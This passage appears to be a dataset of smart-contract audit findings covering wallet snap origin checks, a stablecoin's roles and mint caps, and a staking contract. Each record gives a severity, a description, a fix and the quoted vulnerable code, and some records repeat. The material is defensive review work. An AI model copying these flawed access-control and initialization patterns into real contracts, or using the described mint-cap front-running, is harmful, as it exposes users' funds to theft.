!origin.match(/^https?:\\/\\/localhost:[0-9]{1,4}$/) &&\\n !origin.match(/^https?:\\/\\/(?:\\S+\\.)?solflare\\.com$/) &&\\n !origin.match(/^https?:\\/\\/(?:\\S+\\.)?solflare\\.dev$/)\\n )\\n ) {\\n throw new Error('Invalid origin');\\n }\\n```\\n\\nAptos Snap\\n../aptos-snap/src/index.js:L6-L15\\n```\\nmodule.exports.onRpcRequest = async ({ origin, request }) => {\\n if (\\n !origin ||\\n (\\n !origin.match(/^https?:\\/\\/localhost:[0-9]{1,4}$/) &&\\n !origin.match(/^https?:\\/\\/(?:\\S+\\.)?risewallet\\.dev$/)\\n )\\n ) {\\n throw new Error('Invalid origin');\\n }\\n```\\n\\nSui Snap\\n../sui-snap/src/index.js:L8-L17\\n```\\nmodule.exports.onRpcRequest = async ({ origin, request }) => {\\n if (\\n !origin ||\\n (\\n !origin.match(/^https?:\\/\\/localhost:[0-9]{1,4}$/) &&\\n !origin.match(/^https?:\\/\\/(?:\\S+\\.)?elliwallet\\.dev$/)\\n )\\n ) {\\n throw new Error('Invalid origin');\\n }\\n```\\nчResolution\\nThe client has issued the following statement:\\nChangesets:\\nsolflare-wallet/solflare-snap@749d2b0\\nsolflare-wallet/aptos-snap@eef10b5\\nsolflare-wallet/sui-snap@898295f\\nStatement from the Assessment Team:\\nImplement logic that removes development/localhost origin from the allow list for production builds. Employ strict checks on the format of provided origin. Do not by default allow all subdomains.чч```\\nmodule.exports.onRpcRequest = async ({ origin, request }) => {\\n if (\\n !origin ||\\n (\\n !origin.match(/^https?:\\/\\/localhost:[0-9]{1,4}$/) &&\\n !origin.match(/^https?:\\/\\/(?:\\S+\\.)?solflare\\.com$/) &&\\n !origin.match(/^https?:\\/\\/(?:\\S+\\.)?solflare\\.dev$/)\\n )\\n ) {\\n throw new Error('Invalid origin');\\n }\\n```\\n -All Roles Are Set to the Same Account.чlowчFrom talking to the team we know that all roles will be held by different timelock contracts. In the code they all are initiated to the same `admin` address. That would mean that most roles would need to be transferred. Given that each transfer take 2 transactions and there are 3 roles to transfer that would equate to 6 transactions just to properly set up the contract on deployment. That also increments the time it would take and space for making errors.\\nIt is also should be noted that the `regulator` role is not being initialized there at all.\\n```\\n// solhint-disable-next-line func-name-mixedcase\\nfunction \\_\\_DramAccessControl\\_init\\_unchained(\\n address admin\\n) internal onlyInitializing {\\n \\_grantRole(ADMIN\\_ROLE, admin);\\n \\_grantRole(ROLE\\_MANAGER\\_ROLE, admin);\\n \\_grantRole(SUPPLY\\_MANAGER\\_ROLE, admin);\\n}\\n```\\nчResolution\\nAll roles, including regulatory manager, are now set to different accounts. The modification can be found in commit `b70348e6998e35282212243ea639d174ced1ef2d`\\nWe suggest passing several addresses into the constructor and setting them to the correct addresses right away. Alternatively one can not set them at all and grant those roles later in order to avoid revoking the roles that admin should not have, such as `SUPPLY_MANAGER_ROLE`.чч```\\n// solhint-disable-next-line func-name-mixedcase\\nfunction \\_\\_DramAccessControl\\_init\\_unchained(\\n address admin\\n) internal onlyInitializing {\\n \\_grantRole(ADMIN\\_ROLE, admin);\\n \\_grantRole(ROLE\\_MANAGER\\_ROLE, admin);\\n \\_grantRole(SUPPLY\\_MANAGER\\_ROLE, admin);\\n}\\n```\\n -Setting MintCap to a Specific Value Is Prone to Front-Running.чlowч`Dram` stable coin is using the approval-like model to set the minting caps of different operators, thus it is prone to the same front-run issues as the approval mechanism. When using the `setMintCap` function directly operator could front-run the transaction and completely spend the old cap and then spend the new one again after setting the transaction goes through.\\n```\\nfunction setMintCap(\\n address operator,\\n uint256 amount\\n) external onlyRoleOrAdmin(ROLE\\_MANAGER\\_ROLE) {\\n \\_setMintCap(operator, amount);\\n}\\n```\\n\\nImagine the following scenario:\\nAlice has a mint cap of 10.\\nA transaction is sent to the mem-pool to set it to 5 (decrease the cap). The intent is that Alice should only be able to mint 5 tokens.\\nAlice frontruns this transaction and mints 10 tokens.\\nOnce transaction 2 goes through Alice mints 5 more tokens.\\nIn total Alice minted 15 tokens.чAvoid using setting the specific mint caps and rather use increase/decrease methods that are present in the code already.чч```\\nfunction setMintCap(\\n address operator,\\n uint256 amount\\n) external onlyRoleOrAdmin(ROLE\\_MANAGER\\_ROLE) {\\n \\_setMintCap(operator, amount);\\n}\\n```\\n -Incorrect Priviliges setOperatorAddresses AcknowledgedчhighчThe function `setOperatorAddresses` instead of allowing the Operator to update its own, as well as the Fee Recipient address, incorrectly provides the privileges to the Fee Recipient. As a result, the Fee Recipient can modify the operator address as and when needed, to DoS the operator and exploit the system. Additionally, upon reviewing the documentation, we found that there are no administrative rights defined for the Fee Recipient, hence highlighting the incorrect privilege allocation.\\n```\\nfunction setOperatorAddresses(\\n uint256 \\_operatorIndex,\\n address \\_operatorAddress,\\n address \\_feeRecipientAddress\\n) external onlyActiveOperatorFeeRecipient(\\_operatorIndex) {\\n \\_checkAddress(\\_operatorAddress);\\n \\_checkAddress(\\_feeRecipientAddress);\\n StakingContractStorageLib.OperatorsSlot storage operators = StakingContractStorageLib.getOperators();\\n\\n operators.value[\\_operatorIndex].operator = \\_operatorAddress;\\n operators.value[\\_operatorIndex].feeRecipient = \\_feeRecipientAddress;\\n emit ChangedOperatorAddresses(\\_operatorIndex, \\_operatorAddress, \\_feeRecipientAddress);\\n}\\n```\\nчThe modifier should be `onlyActiveOperatorOrAdmin` allowing only the operator itself or admin of the system, to update the necessary addresses.\\nAlso, for transferring crucial privileges from one address to another, the operator's address should follow a 2-step approach like transferring ownership.чч```\\nfunction setOperatorAddresses(\\n uint256 \\_operatorIndex,\\n address \\_operatorAddress,\\n address \\_feeRecipientAddress\\n) external onlyActiveOperatorFeeRecipient(\\_operatorIndex) {\\n \\_checkAddress(\\_operatorAddress);\\n \\_checkAddress(\\_feeRecipientAddress);\\n StakingContractStorageLib.OperatorsSlot storage operators = StakingContractStorageLib.getOperators();\\n\\n operators.value[\\_operatorIndex].operator = \\_operatorAddress;\\n operators.value[\\_operatorIndex].feeRecipient = \\_feeRecipientAddress;\\n emit ChangedOperatorAddresses(\\_operatorIndex, \\_operatorAddress, \\_feeRecipientAddress);\\n}\\n```\\n -Unconstrained Snapshot While Setting Operator LimitчmediumчFunction `setOperatorLimit` as the name says, allows the `SYS_ADMIN` to set/update the staking limit for an operator. The function ensures that if the limit is being increased, the `_snapshot` must be ahead of the last validator edit(block.number at which the last validator edit occurred). However, the parameter `_snapshot` is unconstrained and can be any number. Also, the functions `addValidators` and `removeValidators` update the `block.number` signifying the last validator edit, but never constrain the new edits with it. Since there are no publicly available functions to access this value, makes the functionality even more confusing and may be unnecessary.\\n```\\nif (\\n operators.value[\\_operatorIndex].limit < \\_limit &&\\n StakingContractStorageLib.getLastValidatorEdit() > \\_snapshot\\n) {\\n revert LastEditAfterSnapshot();\\n}\\n```\\nчIf the functionality is not needed, consider removing it. Otherwise, add some necessary logic to either constrain the last validator edit or add public functions for the users to access it.чч```\\nif (\\n operators.value[\\_operatorIndex].limit < \\_limit &&\\n StakingContractStorageLib.getLastValidatorEdit() > \\_snapshot\\n) {\\n revert LastEditAfterSnapshot();\\n}\\n```\\n -Hardcoded Operator Limit LogicчmediumчThe contract defines some hardcoded limits which is not the right approach for upgradeable contracts and opens doors for accidental mistakes, if not handled with care.\\nThe operators for the current version are limited to 1. If the auditee team decides to open the system to work with more operators but fails to change the limit while upgrading, the upgraded contract will have no effect, and will still disallow any more operators to be added.\\n```\\nfunction addOperator(address \\_operatorAddress, address \\_feeRecipientAddress) external onlyAdmin returns (uint256) {\\n StakingContractStorageLib.OperatorsSlot storage operators = StakingContractStorageLib.getOperators();\\n StakingContractStorageLib.OperatorInfo memory newOperator;\\n\\n if (operators.value.length == 1) {\\n revert MaximumOperatorCountAlreadyReached();\\n }\\n```\\n\\nAlso, the function `_depositOnOneOperator` hardcodes the operator Index as 0 since the contract only supports one operator.\\n```\\nfunction \\_depositOnOneOperator(uint256 \\_depositCount, uint256 \\_totalAvailableValidators) internal {\\n StakingContractStorageLib.setTotalAvailableValidators(\\_totalAvailableValidators - \\_depositCount);\\n \\_depositValidatorsOfOperator(0, \\_depositCount);\\n}\\n```\\nчA better approach could be to constrain the limit of operators that can be added with a storage variable or constant, provided at the time of contract initialization. The contract should also consider supporting dynamic operator deposits for future versions instead of the default hardcoded index.чч```\\nfunction addOperator(address \\_operatorAddress, address \\_feeRecipientAddress) external onlyAdmin returns (uint256) {\\n StakingContractStorageLib.OperatorsSlot storage operators = StakingContractStorageLib.getOperators();\\n StakingContractStorageLib.OperatorInfo memory newOperator;\\n\\n if (operators.value.length == 1) {\\n revert MaximumOperatorCountAlreadyReached();\\n }\\n```\\n -StakingContract - PubKey Length Checks Not Always Enforcedчmediumч`addValidators` checks that the provided `bytes pubKey` is a multiple of the expected pubkey length while functions like `setWithdrawer` do not enforce similar length checks. This is an inconsistency that should be avoided.\\n`addValidators` enforcing input length checks\\n```\\nfunction addValidators(\\n uint256 \\_operatorIndex,\\n uint256 \\_keyCount,\\n bytes calldata \\_publicKeys,\\n bytes calldata \\_signatures\\n) external onlyActiveOperator(\\_operatorIndex) {\\n if (\\_keyCount == 0) {\\n revert InvalidArgument();\\n }\\n\\n if (\\_publicKeys.length % PUBLIC\\_KEY\\_LENGTH != 0 || \\_publicKeys.length / PUBLIC\\_KEY\\_LENGTH != \\_keyCount) {\\n revert InvalidPublicKeys();\\n }\\n```\\n\\n`setWithdrawer` accepting any length for a `pubKey`. Note that `_getPubKeyRoot` will take any input provided and concat it the zero bytes.\\n```\\n/// @notice Set withdrawer for public key\\n/// @dev Only callable by current public key withdrawer\\n/// @param \\_publicKey Public key to change withdrawer\\n/// @param \\_newWithdrawer New withdrawer address\\nfunction setWithdrawer(bytes calldata \\_publicKey, address \\_newWithdrawer) external {\\n if (!StakingContractStorageLib.getWithdrawerCustomizationEnabled()) {\\n revert Forbidden();\\n }\\n \\_checkAddress(\\_newWithdrawer);\\n bytes32 pubkeyRoot = \\_getPubKeyRoot(\\_publicKey);\\n StakingContractStorageLib.WithdrawersSlot storage withdrawers = StakingContractStorageLib.getWithdrawers();\\n\\n if (withdrawers.value[pubkeyRoot] != msg.sender) {\\n revert Unauthorized();\\n }\\n\\n emit ChangedWithdrawer(\\_publicKey, \\_newWithdrawer);\\n\\n withdrawers.value[pubkeyRoot] = \\_newWithdrawer;\\n}\\n```\\n\\n```\\nfunction \\_getPubKeyRoot(bytes memory \\_publicKey) internal pure returns (bytes32) {\\n return sha256(abi.encodePacked(\\_publicKey, bytes16(0)));\\n}\\n```\\n\\nsimilarly, the withdraw family of functions does not enforce a pubkey length either. However, it is unlikely that someone finds a pubkey that matches a root for the attackers address.\\n```\\n/// @notice Withdraw the Execution Layer Fee for a given validator public key\\n/// @dev Funds are sent to the withdrawer account\\n/// @param \\_publicKey Validator to withdraw Execution Layer Fees from\\nfunction withdrawELFee(bytes calldata \\_publicKey) external {\\n \\_onlyWithdrawerOrAdmin(\\_publicKey);\\n \\_deployAndWithdraw(\\_publicKey, EXECUTION\\_LAYER\\_SALT\\_PREFIX, StakingContractStorageLib.getELDispatcher());\\n}\\n```\\n\\nNevertheless, the methods should be hardened so as not to give a malicious actor the freedom to use an unexpected input size for the `pubKey` argument.чEnforce pubkey length checks when accepting a single pubkey as bytes similar to the batch functions that check for a multiple of ´PUBLIC_KEY_LENGTH´. Alternatively, declare the function argument as `bytes48` (however, in this case inputs may be auto-padded to fit the expected length, pot. covering situations that otherwise would throw an error)чч```\\nfunction addValidators(\\n uint256 \\_operatorIndex,\\n uint256 \\_keyCount,\\n bytes calldata \\_publicKeys,\\n bytes calldata \\_signatures\\n) external onlyActiveOperator(\\_operatorIndex) {\\n if (\\_keyCount == 0) {\\n revert InvalidArgument();\\n }\\n\\n if (\\_publicKeys.length % PUBLIC\\_KEY\\_LENGTH != 0 || \\_publicKeys.length / PUBLIC\\_KEY\\_LENGTH != \\_keyCount) {\\n revert InvalidPublicKeys();\\n }\\n```\\n -Unpredictable Behavior Due to Admin Front Running or General Bad TimingчmediumчIn a number of cases, administrators of contracts can update or upgrade things in the system without warning. This has the potential to violate a security goal of the system.\\nSpecifically, privileged roles could use front running to make malicious changes just ahead of incoming transactions, or purely accidental negative effects could occur due to the unfortunate timing of changes.\\nSome instances of this are more important than others, but in general, users of the system should have assurances about the behavior of the action they're about to take.\\nUpgradeable TU proxy\\nFee changes take effect immediately\\n```\\n/// @notice Change the Operator fee\\n/// @param \\_operatorFee Fee in Basis Point\\nfunction setOperatorFee(uint256 \\_operatorFee) external onlyAdmin {\\n if (\\_operatorFee > StakingContractStorageLib.getOperatorCommissionLimit()) {\\n revert InvalidFee();\\n }\\n StakingContractStorageLib.setOperatorFee(\\_operatorFee);\\n emit ChangedOperatorFee(\\_operatorFee);\\n}\\n```\\n\\n```\\n/// @notice Change the Global fee\\n/// @param \\_globalFee Fee in Basis Point\\nfunction setGlobalFee(uint256 \\_globalFee) external onlyAdmin {\\n if (\\_globalFee > StakingContractStorageLib.getGlobalCommissionLimit()) {\\n revert InvalidFee();\\n }\\n StakingContractStorageLib.setGlobalFee(\\_globalFee);\\n emit ChangedGlobalFee(\\_globalFee);\\n}\\n```\\nчThe underlying issue is that users of the system can't be sure what the behavior of a function call will be, and this is because the behavior can change at any time.\\nWe recommend giving the user advance notice of changes with a time lock. For example, make all upgrades require two steps with a mandatory time window between them. The first step merely broadcasts to users that a particular change is coming, and the second step commits that change after a suitable waiting period.чч```\\n/// @notice Change the Operator fee\\n/// @param \\_operatorFee Fee in Basis Point\\nfunction setOperatorFee(uint256 \\_operatorFee) external onlyAdmin {\\n if (\\_operatorFee > StakingContractStorageLib.getOperatorCommissionLimit()) {\\n revert InvalidFee();\\n }\\n StakingContractStorageLib.setOperatorFee(\\_operatorFee);\\n emit ChangedOperatorFee(\\_operatorFee);\\n}\\n```\\n -Potentially Uninitialized ImplementationsчmediumчMost contracts in the system are meant to be used with a proxy pattern. First, the implementations are deployed, and then proxies are deployed that delegatecall into the respective implementations following an initialization call (hardhat, with same transaction). However, the implementations are initialized explicitly nor are they protected from other actors claiming/initializing them. This allows anyone to call initialization functions on implementations for use with phishing attacks (i.e. contract implementation addresses are typically listed on the official project website as valid contracts) which may affect the reputation of the system.\\nNone of the implementations allow unprotected delegatecalls or selfdesturcts. lowering the severity of this finding.\\n```\\nfunction initialize\\_1(\\n address \\_admin,\\n address \\_treasury,\\n address \\_depositContract,\\n address \\_elDispatcher,\\n address \\_clDispatcher,\\n address \\_feeRecipientImplementation,\\n uint256 \\_globalFee,\\n uint256 \\_operatorFee,\\n uint256 globalCommissionLimitBPS,\\n uint256 operatorCommissionLimitBPS\\n) external init(1) {\\n```\\n\\n```\\n/// @notice Initializes the receiver\\n/// @param \\_dispatcher Address that will handle the fee dispatching\\n/// @param \\_publicKeyRoot Public Key root assigned to this receiver\\nfunction init(address \\_dispatcher, bytes32 \\_publicKeyRoot) external {\\n if (initialized) {\\n revert AlreadyInitialized();\\n }\\n initialized = true;\\n dispatcher = IFeeDispatcher(\\_dispatcher);\\n publicKeyRoot = \\_publicKeyRoot;\\n stakingContract = msg.sender; // The staking contract always calls init\\n}\\n```\\n\\n```\\n/// @param \\_publicKeyRoot Public Key root assigned to this receiver\\nfunction init(address \\_dispatcher, bytes32 \\_publicKeyRoot) external {\\n if (initialized) {\\n revert AlreadyInitialized();\\n }\\n initialized = true;\\n dispatcher = IFeeDispatcher(\\_dispatcher);\\n publicKeyRoot = \\_publicKeyRoot;\\n}\\n```\\nчPetrify contracts in the constructor and disallow other actors from claiming/initializing the implementations.чч```\\nfunction initialize\\_1(\\n address \\_admin,\\n address \\_treasury,\\n address \\_depositContract,\\n address \\_elDispatcher,\\n address \\_clDispatcher,\\n address \\_feeRecipientImplementation,\\n uint256 \\_globalFee,\\n uint256 \\_operatorFee,\\n uint256 globalCommissionLimitBPS,\\n uint256 operatorCommissionLimitBPS\\n) external init(1) {\\n```\\n -Operator May DoS the Withdrawal or Make It More ExpensiveчmediumчWhile collecting fees, the operator may:\\ncause DoS for the funds/rewards withdrawal by reverting the call, thus reverting the whole transaction. By doing this, it won't be receiving any rewards, but so the treasury and withdrawer.\\nmake the withdrawal more expensive by sending a huge chunk of `returndata`. As the `returndata` is copied into memory in the caller's context, it will add an extra gas overhead for the withdrawer making it more expensive.\\nor mint gas token\\n```\\nif (operatorFee > 0) {\\n (status, data) = operator.call{value: operatorFee}(\"\");\\n if (status == false) {\\n revert FeeRecipientReceiveError(data);\\n }\\n}\\n```\\nчA possible solution could be to make a low-level call in an inline assembly block, restricting the `returndata` to a couple of bytes, and instead of reverting on the failed call, emit an event, flagging the call that failed.чч```\\nif (operatorFee > 0) {\\n (status, data) = operator.call{value: operatorFee}(\"\");\\n if (status == false) {\\n revert FeeRecipientReceiveError(data);\\n }\\n}\\n```\\n -ConsensusLayerFeeDispatcher/ExecutionLayerFeeDispatcher - Should Hardcode autoPetrify With Highest Initializable Version Instead of User Provided ArgumentчlowчThe version to auto-initialize is not hardcoded with the constructor. On deployment, the deployer may accidentally use the wrong version, allowing anyone to call `initialize` on the contract.\\n```\\n/// @notice Constructor method allowing us to prevent calls to initCLFR by setting the appropriate version\\nconstructor(uint256 \\_version) {\\n VERSION\\_SLOT.setUint256(\\_version);\\n}\\n```\\n\\n```\\n/// @notice Constructor method allowing us to prevent calls to initCLFR by setting the appropriate version\\nconstructor(uint256 \\_version) {\\n VERSION\\_SLOT.setUint256(\\_version);\\n}\\n\\n/// @notice Initialize the contract by storing the staking contract and the public key in storage\\n/// @param \\_stakingContract Address of the Staking Contract\\nfunction initELD(address \\_stakingContract) external init(1) {\\n STAKING\\_CONTRACT\\_ADDRESS\\_SLOT.setAddress(\\_stakingContract);\\n}\\n```\\nчSimilar to the `init(1)` modifier, it is suggested to track the highest version as a `const int` with the contract and auto-initialize to the highest version in the constructor instead of taking the highest version as a deployment argument.чч```\\n/// @notice Constructor method allowing us to prevent calls to initCLFR by setting the appropriate version\\nconstructor(uint256 \\_version) {\\n VERSION\\_SLOT.setUint256(\\_version);\\n}\\n```\\n -StakingContract - Misleading CommentчlowчThe comment notes that the expected caller is `admin` while the modifier checks that `msg.sender` is an active operator.\\n```\\n/// @notice Ensures that the caller is the admin\\nmodifier onlyActiveOperator(uint256 \\_operatorIndex) {\\n \\_onlyActiveOperator(\\_operatorIndex);\\n \\_;\\n}\\n```\\nчRectify the comment to accurately describe the intention of the method/modifier.чч```\\n/// @notice Ensures that the caller is the admin\\nmodifier onlyActiveOperator(uint256 \\_operatorIndex) {\\n \\_onlyActiveOperator(\\_operatorIndex);\\n \\_;\\n}\\n```\\n -Impractical Checks for Global/Operator Fees and the Commission LimitsчlowчThe contract initialization sets up the global and operator fees and also their commission limits. However, the checks just make sure that the fees or commission limit is up to 100% which is not a very practical check. Any unusual value, for instance, if set to 100% will mean the whole rewards/funds will be non-exempted and taxed as global fees, which we believe will never be a case practically.\\n```\\nif (\\_globalFee > BASIS\\_POINTS) {\\n revert InvalidFee();\\n}\\nStakingContractStorageLib.setGlobalFee(\\_globalFee);\\nif (\\_operatorFee > BASIS\\_POINTS) {\\n revert InvalidFee();\\n}\\nStakingContractStorageLib.setOperatorFee(\\_operatorFee);\\n```\\n\\n```\\nfunction initialize\\_2(uint256 globalCommissionLimitBPS, uint256 operatorCommissionLimitBPS) public init(2) {\\n if (globalCommissionLimitBPS > BASIS\\_POINTS) {\\n revert InvalidFee();\\n }\\n StakingContractStorageLib.setGlobalCommissionLimit(globalCommissionLimitBPS);\\n if (operatorCommissionLimitBPS > BASIS\\_POINTS) {\\n revert InvalidFee();\\n }\\n StakingContractStorageLib.setOperatorCommissionLimit(operatorCommissionLimitBPS);\\n}\\n```\\n\\n```\\nfunction setGlobalFee(uint256 \\_globalFee) external onlyAdmin {\\n if (\\_globalFee > StakingContractStorageLib.getGlobalCommissionLimit()) {\\n revert InvalidFee();\\n }\\n StakingContractStorageLib.setGlobalFee(\\_globalFee);\\n emit ChangedGlobalFee(\\_globalFee);\\n}\\n```\\n\\n```\\nfunction setOperatorFee(uint256 \\_operatorFee) external onlyAdmin {\\n if (\\_operatorFee > StakingContractStorageLib.getOperatorCommissionLimit()) {\\n revert InvalidFee();\\n }\\n StakingContractStorageLib.setOperatorFee(\\_operatorFee);\\n emit ChangedOperatorFee(\\_operatorFee);\\n}\\n```\\nчThe fees should be checked with a more practical limit. For instance, checking against a min - max limit, like 20% - 40%.чч```\\nif (\\_globalFee > BASIS\\_POINTS) {\\n revert InvalidFee();\\n}\\nStakingContractStorageLib.setGlobalFee(\\_globalFee);\\nif (\\_operatorFee > BASIS\\_POINTS) {\\n revert InvalidFee();\\n}\\nStakingContractStorageLib.setOperatorFee(\\_operatorFee);\\n```\\n -Contracts Should Inherit From Their InterfacesчlowчThe following contracts should enforce correct interface implementation by inheriting from the interface declarations.\\n```\\n/// @title Ethereum Staking Contract\\n/// @author Kiln\\n/// @notice You can use this contract to store validator keys and have users fund them and trigger deposits.\\ncontract StakingContract {\\n using StakingContractStorageLib for bytes32;\\n```\\n\\n```\\ninterface IStakingContractFeeDetails {\\n function getWithdrawerFromPublicKeyRoot(bytes32 \\_publicKeyRoot) external view returns (address);\\n\\n function getTreasury() external view returns (address);\\n\\n function getOperatorFeeRecipient(bytes32 pubKeyRoot) external view returns (address);\\n\\n function getGlobalFee() external view returns (uint256);\\n\\n function getOperatorFee() external view returns (uint256);\\n\\n function getExitRequestedFromRoot(bytes32 \\_publicKeyRoot) external view returns (bool);\\n\\n function getWithdrawnFromPublicKeyRoot(bytes32 \\_publicKeyRoot) external view returns (bool);\\n\\n function toggleWithdrawnFromPublicKeyRoot(bytes32 \\_publicKeyRoot) external;\\n}\\n```\\n\\n```\\ninterface IFeeRecipient {\\n function init(address \\_dispatcher, bytes32 \\_publicKeyRoot) external;\\n\\n function withdraw() external;\\n}\\n```\\nчInherit from interface.чч```\\n/// @title Ethereum Staking Contract\\n/// @author Kiln\\n/// @notice You can use this contract to store validator keys and have users fund them and trigger deposits.\\ncontract StakingContract {\\n using StakingContractStorageLib for bytes32;\\n```\\n -Misleading Error StatementsчlowчThe contracts define custom errors to revert transactions on failed operations or invalid input, however, they convey little to no information, making it difficult for the off-chain monitoring tools to track relevant updates.\\n```\\nerror Forbidden();\\nerror InvalidFee();\\nerror Deactivated();\\nerror NoOperators();\\nerror InvalidCall();\\nerror Unauthorized();\\nerror DepositFailure();\\nerror DepositsStopped();\\nerror InvalidArgument();\\nerror UnsortedIndexes();\\nerror InvalidPublicKeys();\\nerror InvalidSignatures();\\nerror InvalidWithdrawer();\\nerror InvalidZeroAddress();\\nerror AlreadyInitialized();\\nerror InvalidDepositValue();\\nerror NotEnoughValidators();\\nerror InvalidValidatorCount();\\nerror DuplicateValidatorKey(bytes);\\nerror FundedValidatorDeletionAttempt();\\nerror OperatorLimitTooHigh(uint256 limit, uint256 keyCount);\\nerror MaximumOperatorCountAlreadyReached();\\nerror LastEditAfterSnapshot();\\nerror PublicKeyNotInContract();\\n```\\n\\nFor instance, the `init` modifier is used to initialize the contracts with the current Version. The Version initialization ensures that the provided version must be an increment of the previous version, if not, it reverts with an error as `AlreadyInitialized()`. However, the error doesn't convey an appropriate message correctly, as any version other than the expected version will signify that the version has already been initialized.\\n```\\nmodifier init(uint256 \\_version) {\\n if (\\_version != VERSION\\_SLOT.getUint256() + 1) {\\n revert AlreadyInitialized();\\n }\\n```\\n\\n```\\nmodifier init(uint256 \\_version) {\\n if (\\_version != VERSION\\_SLOT.getUint256() + 1) {\\n revert AlreadyInitialized();\\n }\\n```\\n\\n```\\nmodifier init(uint256 \\_version) {\\n if (\\_version != StakingContractStorageLib.getVersion() + 1) {\\n revert AlreadyInitialized();\\n }\\n```\\nчUse a more meaningful statement with enough information to track off-chain for all the custom errors in every contract in scope. For instance, add the current and supplied versions as indexed parameters, like: IncorrectVersionInitialization(current version, supplied version);\\nAlso, the function can be simplified as\\n```\\n function initELD(address \\_stakingContract) external init(VERSION\\_SLOT.getUint256() + 1) {\\n STAKING\\_CONTRACT\\_ADDRESS\\_SLOT.setAddress(\\_stakingContract);\\n }\\n```\\nчч```\\nerror Forbidden();\\nerror InvalidFee();\\nerror Deactivated();\\nerror NoOperators();\\nerror InvalidCall();\\nerror Unauthorized();\\nerror DepositFailure();\\nerror DepositsStopped();\\nerror InvalidArgument();\\nerror UnsortedIndexes();\\nerror InvalidPublicKeys();\\nerror InvalidSignatures();\\nerror InvalidWithdrawer();\\nerror InvalidZeroAddress();\\nerror AlreadyInitialized();\\nerror InvalidDepositValue();\\nerror NotEnoughValidators();\\nerror InvalidValidatorCount();\\nerror DuplicateValidatorKey(bytes);\\nerror FundedValidatorDeletionAttempt();\\nerror OperatorLimitTooHigh(uint256 limit, uint256 keyCount);\\nerror MaximumOperatorCountAlreadyReached();\\nerror LastEditAfterSnapshot();\\nerror PublicKeyNotInContract();\\n```\\n -Incorrect Priviliges setOperatorAddresses AcknowledgedчhighчThe function `setOperatorAddresses` instead of allowing the Operator to update its own, as well as the Fee Recipient address, incorrectly provides the privileges to the Fee Recipient. As a result, the Fee Recipient can modify the operator address as and when needed, to DoS the operator and exploit the system. Additionally, upon reviewing the documentation, we found that there are no administrative rights defined for the Fee Recipient, hence highlighting the incorrect privilege allocation.\\n```\\nfunction setOperatorAddresses(\\n uint256 \\_operatorIndex,\\n address \\_operatorAddress,\\n address \\_feeRecipientAddress\\n) external onlyActiveOperatorFeeRecipient(\\_operatorIndex) {\\n \\_checkAddress(\\_operatorAddress);\\n \\_checkAddress(\\_feeRecipientAddress);\\n StakingContractStorageLib.OperatorsSlot storage operators = StakingContractStorageLib.getOperators();\\n\\n operators.value[\\_operatorIndex].operator = \\_operatorAddress;\\n operators.value[\\_operatorIndex].feeRecipient = \\_feeRecipientAddress;\\n emit ChangedOperatorAddresses(\\_operatorIndex, \\_operatorAddress, \\_feeRecipientAddress);\\n}\\n```\\nчThe modifier should be `onlyActiveOperatorOrAdmin` allowing only the operator itself or admin of the system, to update the necessary addresses.\\nAlso, for transferring crucial privileges from one address to another, the operator's address should follow a 2-step approach like transferring ownership.чч```\\nfunction setOperatorAddresses(\\n uint256 \\_operatorIndex,\\n address \\_operatorAddress,\\n address \\_feeRecipientAddress\\n) external onlyActiveOperatorFeeRecipient(\\_operatorIndex) {\\n \\_checkAddress(\\_operatorAddress);\\n \\_checkAddress(\\_feeRecipientAddress);\\n StakingContractStorageLib.OperatorsSlot storage operators = StakingContractStorageLib.getOperators();\\n\\n operators.value[\\_operatorIndex].operator = \\_operatorAddress;\\n operators.value[\\_operatorIndex].feeRecipient = \\_feeRecipientAddress;\\n emit ChangedOperatorAddresses(\\_operatorIndex, \\_operatorAddress, \\_feeRecipientAddress);\\n}\\n```\\n -Unconstrained Snapshot While Setting Operator LimitчmediumчFunction `setOperatorLimit` as the name says, allows the `SYS_ADMIN` to set/update the staking limit for an operator. The function ensures that if the limit is being increased, the `_snapshot` must be ahead of the last validator edit(block.number at which the last validator edit occurred). However, the parameter `_snapshot` is unconstrained and can be any number. Also, the functions `addValidators` and `removeValidators` update the `block.number` signifying the last validator edit, but never constrain the new edits with it. Since there are no publicly available functions to access this value, makes the functionality even more confusing and may be unnecessary.\\n```\\nif (\\n operators.value[\\_operatorIndex].limit < \\_limit &&\\n StakingContractStorageLib.getLastValidatorEdit() > \\_snapshot\\n) {\\n revert LastEditAfterSnapshot();\\n}\\n```\\nчIf the functionality is not needed, consider removing it. Otherwise, add some necessary logic to either constrain the last validator edit or add public functions for the users to access it.чч```\\nif (\\n operators.value[\\_operatorIndex].limit < \\_limit &&\\n StakingContractStorageLib.getLastValidatorEdit() > \\_snapshot\\n) {\\n revert LastEditAfterSnapshot();\\n}\\n```\\n -Hardcoded Operator Limit LogicчmediumчThe contract defines some hardcoded limits which is not the right approach for upgradeable contracts and opens doors for accidental mistakes, if not handled with care.\\nThe operators for the current version are limited to 1. If the auditee team decides to open the system to work with more operators but fails to change the limit while upgrading, the upgraded contract will have no effect, and will still disallow any more operators to be added.\\n```\\nfunction addOperator(address \\_operatorAddress, address \\_feeRecipientAddress) external onlyAdmin returns (uint256) {\\n StakingContractStorageLib.OperatorsSlot storage operators = StakingContractStorageLib.getOperators();\\n StakingContractStorageLib.OperatorInfo memory newOperator;\\n\\n if (operators.value.length == 1) {\\n revert MaximumOperatorCountAlreadyReached();\\n }\\n```\\n\\nAlso, the function `_depositOnOneOperator` hardcodes the operator Index as 0 since the contract only supports one operator.\\n```\\nfunction \\_depositOnOneOperator(uint256 \\_depositCount, uint256 \\_totalAvailableValidators) internal {\\n StakingContractStorageLib.setTotalAvailableValidators(\\_totalAvailableValidators - \\_depositCount);\\n \\_depositValidatorsOfOperator(0, \\_depositCount);\\n}\\n```\\nчA better approach could be to constrain the limit of operators that can be added with a storage variable or constant, provided at the time of contract initialization. The contract should also consider supporting dynamic operator deposits for future versions instead of the default hardcoded index.чч```\\nfunction addOperator(address \\_operatorAddress, address \\_feeRecipientAddress) external onlyAdmin returns (uint256) {\\n StakingContractStorageLib.OperatorsSlot storage operators = StakingContractStorageLib.getOperators();\\n StakingContractStorageLib.OperatorInfo memory newOperator;\\n\\n if (operators.value.length == 1) {\\n revert MaximumOperatorCountAlreadyReached();\\n }\\n```\\n -StakingContract - PubKey Length Checks Not Always Enforcedчmediumч`addValidators` checks that the provided `bytes pubKey` is a multiple of the expected pubkey length while functions like `setWithdrawer` do not enforce similar length checks. This is an inconsistency that should be avoided.\\n`addValidators` enforcing input length checks\\n```\\nfunction addValidators(\\n uint256 \\_operatorIndex,\\n uint256 \\_keyCount,\\n bytes calldata \\_publicKeys,\\n bytes calldata \\_signatures\\n) external 